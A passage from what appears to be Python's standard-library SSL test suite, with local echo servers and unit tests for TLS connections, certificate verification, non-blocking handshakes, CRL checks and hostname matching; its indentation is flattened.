def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ConnectionResetError:
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
